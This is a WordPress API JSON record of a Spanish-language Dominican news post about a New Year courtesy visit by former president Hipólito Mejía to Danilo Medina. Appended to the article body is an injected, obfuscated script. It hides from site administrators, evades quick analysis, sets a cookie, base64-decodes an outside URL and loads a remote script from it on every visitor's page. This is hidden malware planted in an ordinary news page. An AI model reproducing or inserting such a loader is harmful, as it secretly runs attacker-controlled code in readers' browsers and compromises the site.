{"id":13039,"date":"2023-01-03T20:05:51","date_gmt":"2023-01-04T00:05:51","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13039"},"modified":"2023-01-03T20:05:51","modified_gmt":"2023-01-04T00:05:51","slug":"expresidentes-hipolito-mejia-y-danilo-medina-se-reunen","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13039","title":{"rendered":"Expresidentes Hip\u00f3lito Mej\u00eda y Danilo Medina se re\u00fanen"},"content":{"rendered":"<p>Con motivo del a\u00f1o nuevo el expresidente Hip\u00f3lito Mej\u00eda gira visita de cortes\u00eda al tambi\u00e9n exmandatario Danilo Medina.<\/p>\n<p>El expresidente de la Rep\u00fablica, Danilo Medina, presidente del Partido de la Liberaci\u00f3n Dominicana (PLD), recibi\u00f3 a media ma\u00f1ana de este martes la visita de cortes\u00eda del tambi\u00e9n ex Presidente de la Rep\u00fablica, Hip\u00f3lito Mej\u00eda.<\/p>\n<p>Pr\u00f3ximo a las once horas de la ma\u00f1ana de este martes se aperson\u00f3 al apartamento de la familia Medina, en los Cacicazgos del Distrito Nacional, el expresidente Hip\u00f3lito Mej\u00eda, alto dirigente del gobernante Partido Revolucionario Moderno (PRM).<\/p>\n<p>De inmediato fue recibido en las oficinas que dispone el presidente del PLD en su residencia, compartiendo en un ambiente de respeto y familiaridad.<\/p>\n<p>\u201cEs una visita con motivo del inicio del nuevo a\u00f1o\u201d, se dice es un despacho de Prensa del Partido de la Liberaci\u00f3n Dominicana divulgado junto a la fotograf\u00eda del momento en que ambos exmandatarios comparten amenamente.<\/p>\n<p>La fotograf\u00eda del encuentro de Hip\u00f3lito Mej\u00eda y Danilo Medina se hizo teniendo de referencia una imagen del expresidente de la Rep\u00fablica y l\u00edder hist\u00f3rico del PLD, profesor Juan Bosch.<\/p>\n<p>En el despacho period\u00edstico se informa que ambos exmandatarios trataron temas de la actualidad y las perspectivas nacionales con miras al a\u00f1o que reci\u00e9n se inicia.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Con motivo del a\u00f1o nuevo el expresidente Hip\u00f3lito Mej\u00eda gira visita de cortes\u00eda al tambi\u00e9n exmandatario Danilo Medina. El expresidente de la Rep\u00fablica, Danilo Medina, presidente del Partido de la Liberaci\u00f3n Dominicana (PLD), recibi\u00f3 a media ma\u00f1ana de este martes la visita de cortes\u00eda del tambi\u00e9n ex Presidente de la Rep\u00fablica, Hip\u00f3lito Mej\u00eda. Pr\u00f3ximo a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13041,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13039","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13039","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13039"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13039\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13041"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13039"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13039"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13039"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}